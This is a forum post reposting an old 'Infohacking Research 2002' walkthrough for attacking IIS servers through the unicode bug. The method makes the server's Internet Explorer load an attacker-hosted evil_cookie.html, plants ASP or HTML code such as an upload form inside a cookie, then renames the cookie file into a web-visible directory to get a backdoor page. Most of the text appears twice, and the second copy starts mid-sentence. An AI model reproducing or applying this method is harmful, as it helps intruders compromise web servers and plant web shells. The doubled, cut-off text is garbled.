-=Player=-
14.10.2007, 12:12
Scenario : An IIS with the unicode bug is protected with a fascist firewall that only allows
outbound connections from a Proxy. There is no way to open direct connections from the IIS
to the Internet. But there is a Proxy, and probably the IE of the IIS box is configured to
use that proxy...You only have to launch an IE :
http://vulnerable_target/<unicode_string>/<path_to_IE>/<IP_of_your_server>/evil_cookie.html
What is evil_cookie.html ?
An html page that writes a cookie on the IIS vulnerable box.
How can you inject code there ?
On "document.cookie" function, you can use the variable that sets the cookie name to put
your code...
document.cookie = "<HERE_I_WRITE_MY_CODE>" + ....
This code can be an html, asp, ... a nice form to upload files ?
There are some limitations on what you can put on your cookie injected code...
1) Be careful with special caracters " ; and others ( we let you play with it )
2) 4 k is max size for a cookie... ;-)
After page has been loaded by the IIS, you have to find the cookie...
Usually cookies are stored on user's profile directory, but remenber you are launching IE as
the IIS user ... ;-) , so cookie is stored on other place... Find yourself !
Rename the cookie to .html, .asp, and put it on a visible directory of the server.
Then you have your nice-evil page waiting for you.
Note : we know there are better ways to upload files to the server, this is only a different
way to do it, and a way to show how dangerous can be cookies, yes, those liltle, only text
files ...
Infohacking Research 2002
outbound connections from a Proxy. There is no way to open direct connections from the IIS
to the Internet. But there is a Proxy, and probably the IE of the IIS box is configured to
use that proxy...You only have to launch an IE :
http://vulnerable_target/<unicode_string>/<path_to_IE>/<IP_of_your_server>/evil_cookie.html
What is evil_cookie.html ?
An html page that writes a cookie on the IIS vulnerable box.
How can you inject code there ?
On "document.cookie" function, you can use the variable that sets the cookie name to put
your code...
document.cookie = "<HERE_I_WRITE_MY_CODE>" + ....
This code can be an html, asp, ... a nice form to upload files ?
There are some limitations on what you can put on your cookie injected code...
1) Be careful with special caracters " ; and others ( we let you play with it )
2) 4 k is max size for a cookie... ;-)
After page has been loaded by the IIS, you have to find the cookie...
Usually cookies are stored on user's profile directory, but remenber you are launching IE as
the IIS user ... ;-) , so cookie is stored on other place... Find yourself !
Rename the cookie to .html, .asp, and put it on a visible directory of the server.
Then you have your nice-evil page waiting for you.
Note : we know there are better ways to upload files to the server, this is only a different
way to do it, and a way to show how dangerous can be cookies, yes, those liltle, only text
files ...
Infohacking Research 2002